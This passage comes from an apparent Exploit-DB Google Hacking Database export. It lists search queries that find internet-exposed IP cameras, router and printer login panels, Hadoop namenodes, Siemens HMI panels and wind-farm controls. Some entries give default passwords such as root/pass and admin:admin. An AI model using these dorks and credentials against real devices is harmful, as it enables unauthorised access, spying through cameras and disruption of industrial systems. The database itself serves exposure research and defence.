<link>https://www.exploit-db.com/ghdb/5222</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;LaserJet&quot; &quot;Device status&quot; &quot;Supplies summary&quot;</shortDescription>
<textualDescription>This Dork finds HP MFP devices that have their management interface exposed to the Internet.
# Exploit Title: HP MFP Devices
# Google Dork: intitle:&quot;LaserJet&quot; &quot;Device status&quot; &quot;Supplies summary&quot;
# Date: May 22, 2019
# Exploit Author: Robert Marmorstein
# Vendor Homepage: https://www8.hp.com/us/en/home.html</textualDescription>
<query>intitle:&quot;LaserJet&quot; &quot;Device status&quot; &quot;Supplies summary&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;LaserJet&quot; &quot;Device status&quot; &quot;Supplies summary&quot;</querystring>
<edb></edb>
<date>2019-05-23</date>
<author>Robert Marmorstein</author>
</entry>
<entry>
<id>927</id>
<link>https://www.exploit-db.com/ghdb/927</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Lexmark *&quot; inurl:port_0</shortDescription>
<textualDescription>Lexmark printers (4 models)</textualDescription>
<query>intitle:&quot;Lexmark *&quot; inurl:port_0</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Lexmark+*%22+inurl%3Aport_0&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>7051</id>
<link>https://www.exploit-db.com/ghdb/7051</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;lg smart ip device&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;lg smart ip device&quot; -.com
# Category: Various Online Devices
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;lg smart ip device&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;lg smart ip device&quot; -.com</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>755</id>
<link>https://www.exploit-db.com/ghdb/755</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Live NetSnap Cam-Server feed&quot;</shortDescription>
<textualDescription>Netsnap Online Cameras</textualDescription>
<query>intitle:&quot;Live NetSnap Cam-Server feed&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Live+NetSnap+Cam-Server+feed%22</querystring>
<edb></edb>
<date>2004-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>342</id>
<link>https://www.exploit-db.com/ghdb/342</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Live View / - AXIS&quot;</shortDescription>
<textualDescription>These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ): &quot;By default, the username will be â€ÃÅ“root’ and the password will be â€ÃÅ“pass’. If these are not the current values, performing a factory default on the unit will reset the password to â€ÃÅ“pass’.&quot;Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x</textualDescription>
<query>intitle:&quot;Live View / - AXIS&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1392</id>
<link>https://www.exploit-db.com/ghdb/1392</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Live View / - AXIS&quot; | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:&quot;MJPG Live Demo&quot; | &quot;intext:Select preset position&quot;</shortDescription>
<textualDescription>No one search will reveal all Axis cameras. This is my mod of one of the queries. It usualy returns 990-1000 of the 1000 results google allows.</textualDescription>
<query>intitle:&quot;Live View / - AXIS&quot; | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:&quot;MJPG Live Demo&quot; | &quot;intext:Select preset position&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Live+View+/+-+AXIS%22+%7C+inurl:view/view.shtml+OR+inurl:view/indexFrame.shtml+%7C+intitle:%22MJPG+Live+Demo%22+%7C++%22intext:Select+preset+position%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6910</id>
<link>https://www.exploit-db.com/ghdb/6910</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;LK IHC controller&quot; intext:&quot;LK IHC&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;LK IHC controller&quot; intext:&quot;LK IHC&quot;
# Various Online Devices
# Date: 03/05/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;LK IHC controller&quot; intext:&quot;LK IHC&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;LK IHC controller&quot; intext:&quot;LK IHC&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4374</id>
<link>https://www.exploit-db.com/ghdb/4374</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Log In to AR Web&quot;</shortDescription>
<textualDescription>Huawei AR Routers login panels
Google Dork: intitle:&quot;Log In to AR Web&quot;
Date: 2016-12-14
Author: Devendra Singh Solanki</textualDescription>
<query>intitle:&quot;Log In to AR Web&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Log In to AR Web&quot;</querystring>
<edb></edb>
<date>2016-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5092</id>
<link>https://www.exploit-db.com/ghdb/5092</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Login - Xfinity&quot; AND &quot;Gateway &gt; Login&quot;</shortDescription>
<textualDescription>Dork about login panels of Xfinity Routers
intitle:&quot;Login - Xfinity&quot; AND &quot;Gateway &gt; Login&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:&quot;Login - Xfinity&quot; AND &quot;Gateway &gt; Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - Xfinity&quot; AND &quot;Gateway &gt; Login&quot;</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>7189</id>
<link>https://www.exploit-db.com/ghdb/7189</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Login&quot; intext:&quot;PLANET Technology Corporation. All rights reserved.&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; intext:&quot;PLANET Technology Corporation. All rights reserved.&quot;
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Login&quot; intext:&quot;PLANET Technology Corporation. All rights reserved.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; intext:&quot;PLANET Technology Corporation. All rights reserved.&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4359</id>
<link>https://www.exploit-db.com/ghdb/4359</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Login&quot; inurl:&quot;/doc/page/login.asp&quot;</shortDescription>
<textualDescription>Interface for HikVision web cam
Google Dork: intitle:&quot;Login&quot; inurl:&quot;/doc/page/login.asp&quot;
Date: 2016-11-28
Author: Devendra Singh Solanki</textualDescription>
<query>intitle:&quot;Login&quot; inurl:&quot;/doc/page/login.asp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; inurl:&quot;/doc/page/login.asp&quot;</querystring>
<edb></edb>
<date>2016-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6907</id>
<link>https://www.exploit-db.com/ghdb/6907</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Login&quot; inurl:&quot;/simple/view/login.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; inurl:&quot;/simple/view/login.html&quot;
# Various Online Devices.
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Login&quot; inurl:&quot;/simple/view/login.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login&quot; inurl:&quot;/simple/view/login.html&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5613</id>
<link>https://www.exploit-db.com/ghdb/5613</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Marshall VS Server&quot;</shortDescription>
<textualDescription>Online Devices:
intitle:&quot;Marshall VS Server&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Marshall VS Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Marshall VS Server&quot;</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7492</id>
<link>https://www.exploit-db.com/ghdb/7492</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Microseven M7CAM IP Camera&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Microseven M7CAM IP Camera&quot;
# Various Online Devices
# Date:26/10/2021
# Exploit Author: Neha Singh</textualDescription>
<query>intitle:&quot;Microseven M7CAM IP Camera&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Microseven M7CAM IP Camera&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>1036</id>
<link>https://www.exploit-db.com/ghdb/1036</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Middle frame of Videoconference Management System&quot; ext:htm</shortDescription>
<textualDescription>Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.</textualDescription>
<query>intitle:&quot;Middle frame of Videoconference Management System&quot; ext:htm</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22Middle+frame+of+Videoconference+Management+System%22+ext%3Ahtm</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>6894</id>
<link>https://www.exploit-db.com/ghdb/6894</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Milesight Network Camera&quot; intext:&quot;Language&quot;</shortDescription>
<textualDescription># DorK: intitle:&quot;Milesight Network Camera&quot; intext:&quot;Language&quot;</textualDescription>
<query>intitle:&quot;Milesight Network Camera&quot; intext:&quot;Language&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Milesight Network Camera&quot; intext:&quot;Language&quot;</querystring>
<edb></edb>
<date>2021-04-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6500</id>
<link>https://www.exploit-db.com/ghdb/6500</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Miniweb Start Page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Miniweb Start Page&quot;
# Siemens SIMATIC HMI panels.
# Date: 27/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Miniweb Start Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Miniweb Start Page&quot;</querystring>
<edb></edb>
<date>2020-08-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7822</id>
<link>https://www.exploit-db.com/ghdb/7822</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;MODBUS TCP RS485 Converter&quot; intext:&quot;Module Name: MMTCPBCONV&quot; &quot;powered by Atmel ARM.&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;MODBUS TCP RS485 Converter&quot; intext:&quot;Module Name: MMTCPBCONV&quot; &quot;powered by Atmel ARM.&quot;
# Various Online Devices
# Date: 26/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;MODBUS TCP RS485 Converter&quot; intext:&quot;Module Name: MMTCPBCONV&quot; &quot;powered by Atmel ARM.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;MODBUS TCP RS485 Converter&quot; intext:&quot;Module Name: MMTCPBCONV&quot; &quot;powered by Atmel ARM.&quot;</querystring>
<edb></edb>
<date>2021-11-17</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>552</id>
<link>https://www.exploit-db.com/ghdb/552</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;my webcamXP server!&quot; inurl:&quot;:8080&quot;</shortDescription>
<textualDescription>&quot;my webcamXP server!&quot;Is there really an explantation needed?</textualDescription>
<query>intitle:&quot;my webcamXP server!&quot; inurl:&quot;:8080&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22my+webcamXP+server%21%22+inurl%3A%22%3A8080%22</querystring>
<edb></edb>
<date>2004-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6989</id>
<link>https://www.exploit-db.com/ghdb/6989</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;myhome&quot; intext:&quot;Tilgin. All rights reserved. Copyright and Trademark.&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;myhome&quot; intext:&quot;Tilgin. All rights reserved. Copyright and Trademark.&quot;</textualDescription>
<query>intitle:&quot;myhome&quot; intext:&quot;Tilgin. All rights reserved. Copyright and Trademark.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;myhome&quot; intext:&quot;Tilgin. All rights reserved. Copyright and Trademark.&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4546</id>
<link>https://www.exploit-db.com/ghdb/4546</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Namenode information&quot;</shortDescription>
<textualDescription>Finds unpassworded file systems just waiting to be exploited.
Dxtroyer</textualDescription>
<query>intitle:&quot;Namenode information&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Namenode information&quot;</querystring>
<edb></edb>
<date>2017-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4559</id>
<link>https://www.exploit-db.com/ghdb/4559</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Namenode information&quot; AND inurl:&quot;:50070/dfshealth.html&quot;</shortDescription>
<textualDescription>NameNode Storage Information for Infrastructure Hadoop
------------------------------
Ing. Daniel Maldonado
http://caceriadespammers.com.ar</textualDescription>
<query>intitle:&quot;Namenode information&quot; AND inurl:&quot;:50070/dfshealth.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Namenode information&quot; AND inurl:&quot;:50070/dfshealth.html&quot;</querystring>
<edb></edb>
<date>2017-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>1282</id>
<link>https://www.exploit-db.com/ghdb/1282</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NAS&quot; inurl:indexeng.html</shortDescription>
<textualDescription>Disk Online Server NAS device.</textualDescription>
<query>intitle:&quot;NAS&quot; inurl:indexeng.html</query>
<querystring>https://www.google.com/search?q=intitle:%22NAS%22+inurl:indexeng.html&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>942</id>
<link>https://www.exploit-db.com/ghdb/942</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NeroNET - burning online&quot;</shortDescription>
<textualDescription>NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. Well they were smart enough to convienently place the default password located within the softwares manual.</textualDescription>
<query>intitle:&quot;NeroNET - burning online&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3ANeroNET+-+burning+online</querystring>
<edb></edb>
<date>2005-04-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1420</id>
<link>https://www.exploit-db.com/ghdb/1420</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Net2Phone Init Page&quot;</shortDescription>
<textualDescription>Net2Phone CommCenterÂî is software that allows you to make phone calls and send faxes to anywhere in the world.</textualDescription>
<query>intitle:&quot;Net2Phone Init Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Net2Phone+Init+Page%22&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1116</id>
<link>https://www.exploit-db.com/ghdb/1116</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;netbotz appliance&quot; -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces</shortDescription>
<textualDescription>Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available.</textualDescription>
<query>intitle:&quot;netbotz appliance&quot; -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22netbotz+appliance%22+-inurl%3A.php+-inurl%3A.asp+-inurl%3A.pdf+-inurl%3Asecuritypipeline+-announces</querystring>
<edb></edb>
<date>2005-09-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3872</id>
<link>https://www.exploit-db.com/ghdb/3872</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NetBotz Network Monitoring Appliance&quot;</shortDescription>
<textualDescription>#Summary:Various Online Divices
#Category: Pages containing login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;NetBotz Network Monitoring Appliance&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetBotz Network Monitoring Appliance&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1080</id>
<link>https://www.exploit-db.com/ghdb/1080</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NetCam Live Image&quot; -.edu -.gov -johnny.ihackstuff.com</shortDescription>
<textualDescription>This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. They have a default admin name/pass but I haven't taken the time to figure it out.</textualDescription>
<query>intitle:&quot;NetCam Live Image&quot; -.edu -.gov -johnny.ihackstuff.com</query>
<querystring>https://www.google.com/search?q=intitle:%22NetCam+Live+Image%22+-.edu+-.gov+-johnny.ihackstuff.com&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1151</id>
<link>https://www.exploit-db.com/ghdb/1151</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Netcam&quot; intitle:&quot;user login&quot;</shortDescription>
<textualDescription>just yet other online cam.</textualDescription>
<query>intitle:&quot;Netcam&quot; intitle:&quot;user login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Netcam%22+intitle:%22user+login%22&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5135</id>
<link>https://www.exploit-db.com/ghdb/5135</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NetcamSC IP Address&quot;</shortDescription>
<textualDescription>Reveals ip address
Regards
Hussain Vohra
</textualDescription>
<query>intitle:&quot;NetcamSC IP Address&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetcamSC IP Address&quot;</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>Hussain Vohra</author>
</entry>
<entry>
<id>6721</id>
<link>https://www.exploit-db.com/ghdb/6721</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NetCamSC*&quot;</shortDescription>
<textualDescription>#Exploit Title :Various online devices.
#Google Dork : intitle:&quot;NetCamSC*&quot;
#Date : 2/12/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>intitle:&quot;NetCamSC*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetCamSC*&quot;</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6629</id>
<link>https://www.exploit-db.com/ghdb/6629</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NetCamSC*&quot; | intitle:&quot;NetCamXL*&quot; inurl:index.html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NetCamSC*&quot; | intitle:&quot;NetCamXL*&quot; inurl:index.html
# Various online devices (webcams).
# Date: 15/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;NetCamSC*&quot; | intitle:&quot;NetCamXL*&quot; inurl:index.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetCamSC*&quot; | intitle:&quot;NetCamXL*&quot; inurl:index.html</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6720</id>
<link>https://www.exploit-db.com/ghdb/6720</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NetCamXL*&quot;</shortDescription>
<textualDescription>#Exploit Title :Various online devices.
#Google Dork :intitle:&quot;NetCamXL*&quot;
#Date : 2/12/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>intitle:&quot;NetCamXL*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetCamXL*&quot;</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>7113</id>
<link>https://www.exploit-db.com/ghdb/7113</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Netgear System Login&quot; intext:&quot;system name&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Netgear System Login&quot; intext:&quot;system name&quot;
# Category: Various Online Devices
# Date: 04/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Netgear System Login&quot; intext:&quot;system name&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Netgear System Login&quot; intext:&quot;system name&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>994</id>
<link>https://www.exploit-db.com/ghdb/994</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Netopia Router (*.)&quot;&quot;to view this site&quot;</shortDescription>
<textualDescription>Web admin for netopia routersThis Web tool provides access to information about the current status of your router and connections.</textualDescription>
<query>intitle:&quot;Netopia Router (*.)&quot;&quot;to view this site&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Netopia+Router+(*.)%22%22to+view+this+site%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6867</id>
<link>https://www.exploit-db.com/ghdb/6867</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NETSuveillance WEB&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NETSuveillance WEB&quot;
# Various Online Devices
# Date: 08/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;NETSuveillance WEB&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NETSuveillance WEB&quot;</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7981</id>
<link>https://www.exploit-db.com/ghdb/7981</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Network Camera&quot; inurl:main.cgi</shortDescription>
<textualDescription> Google Dork: intitle:&quot;Network Camera&quot; inurl:main.cgi
# Various Online Devices
# Date:20/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;Network Camera&quot; inurl:main.cgi</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Network Camera&quot; inurl:main.cgi</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>815</id>
<link>https://www.exploit-db.com/ghdb/815</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Network Print Server&quot; filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )</shortDescription>
<textualDescription>Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future.</textualDescription>
<query>intitle:&quot;Network Print Server&quot; filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )</query>
<querystring>https://www.google.com/search?q=intitle:%22Network+Print+Server%22+filetype:shtm+(+inurl:u_printjobs+%7C+inurl:u_server+%7C+inurl:a_server+%7C+inurl:u_generalhelp+%7C+u_printjobs+)&amp;num=100&amp;fi</querystring>
<edb></edb>
<date>2005-01-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>816</id>
<link>https://www.exploit-db.com/ghdb/816</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Network Print Server&quot; intext:&quot;http://www.axis.com&quot; filetype:shtm</shortDescription>
<textualDescription>Axis Network Print Server devices (a better shorter search).</textualDescription>
<query>intitle:&quot;Network Print Server&quot; intext:&quot;http://www.axis.com&quot; filetype:shtm</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22Network+Print+Server%22+intext%3A%22http%3A%2F%2Fwww.axis.com%22+filetype%3Ashtm</querystring>
<edb></edb>
<date>2005-01-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1065</id>
<link>https://www.exploit-db.com/ghdb/1065</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Network Storage Link for USB 2.0 Disks&quot; Firmware</shortDescription>
<textualDescription>Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&amp;filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked some are not. Some logins to the NSLU2 will be a link off a website. Enjoy.</textualDescription>
<query>http://www.google.com/search?q=intitle:%22Network+Storage+Link+for+USB+2.0+Disks%22+Firmware&amp;num=100&amp;hl=en&amp;lr=&amp;c2coff=1&amp;safe=off&amp;filter=0</query>
<querystring>https://www.google.com/search?q=intitle:Network%2BStorage%2BLink%2Bfor%2BUSB%2B2.0+Disks+intext:Disks+User+Log+in+(Private+Data)+++DISK+(Private+Data)+FLASH+(Public+Data)+Firmware+Version++&amp;hs=Yms&amp;rls=org.mozilla:en-US:official&amp;</querystring>
<edb></edb>
<date>2005-08-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6906</id>
<link>https://www.exploit-db.com/ghdb/6906</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NodeCore PoW Mining Pool&quot; &quot;NETWORK&quot; &quot;TYPE&quot; &quot;POOL ADDRESS&quot; &quot;FEE&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NodeCore PoW Mining Pool&quot; &quot;NETWORK&quot; &quot;TYPE&quot; &quot;POOL ADDRESS&quot; &quot;FEE&quot;
# Various Online Devices
# Date: 27/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;NodeCore PoW Mining Pool&quot; &quot;NETWORK&quot; &quot;TYPE&quot; &quot;POOL ADDRESS&quot; &quot;FEE&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NodeCore PoW Mining Pool&quot; &quot;NETWORK&quot; &quot;TYPE&quot; &quot;POOL ADDRESS&quot; &quot;FEE&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6816</id>
<link>https://www.exploit-db.com/ghdb/6816</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Nordex Control&quot; + &quot;Wind Farm Total Summary&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Nordex Control&quot; + &quot;Wind Farm Total Summary&quot;
# Various online devices (Nordex wind turbine farms).
# Date: 02/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Nordex Control&quot; + &quot;Wind Farm Total Summary&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Nordex Control&quot; + &quot;Wind Farm Total Summary&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8002</id>
<link>https://www.exploit-db.com/ghdb/8002</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;NoVus IP camera&quot; -com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NoVus IP camera&quot; -com
# Various Online Devices
# Date:25/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;NoVus IP camera&quot; -com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NoVus IP camera&quot; -com</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>s Thakur</author>
</entry>
<entry>
<id>933</id>
<link>https://www.exploit-db.com/ghdb/933</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;OfficeConnect Cable/DSL Gateway&quot; intext:&quot;Checking your browser&quot;</shortDescription>
<textualDescription>This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password.</textualDescription>
<query>intitle:&quot;OfficeConnect Cable/DSL Gateway&quot; intext:&quot;Checking your browser&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22OfficeConnect+Cable%2FDSL+Gateway%22+intext%3A%22Checking+your+browser%22</querystring>
<edb></edb>
<date>2005-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>925</id>
<link>https://www.exploit-db.com/ghdb/925</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;OfficeConnect Wireless 11g Access Point&quot; &quot;Checking your browser&quot;</shortDescription>
<textualDescription>OfficeConnect Wireless 11g Access Point</textualDescription>
<query>intitle:&quot;OfficeConnect Wireless 11g Access Point&quot; &quot;Checking your browser&quot;</query>
